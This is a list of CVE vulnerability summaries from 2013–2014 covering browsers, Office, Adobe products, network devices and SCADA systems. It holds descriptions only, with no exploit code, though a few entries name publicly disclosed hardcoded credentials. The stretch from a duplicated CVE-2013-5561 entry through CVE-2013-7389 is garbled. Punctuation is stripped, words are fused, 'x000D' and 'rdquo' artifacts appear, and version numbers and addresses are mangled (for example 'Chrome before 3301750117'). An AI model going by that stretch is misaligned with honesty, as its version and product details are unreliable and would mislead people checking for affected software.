Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384
Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734
Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777
The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319
FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340
Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492
Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507
Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736
Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780
Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803
ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824
Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826
WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116
Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137
Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280
EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632
The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656
Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856
Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860
Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893
Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897
Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900
The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905
Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223
The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436
The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478
Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529
Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555
Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776
NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057
hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369
IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428
IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431
Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507
The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536
Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559
Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561
The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
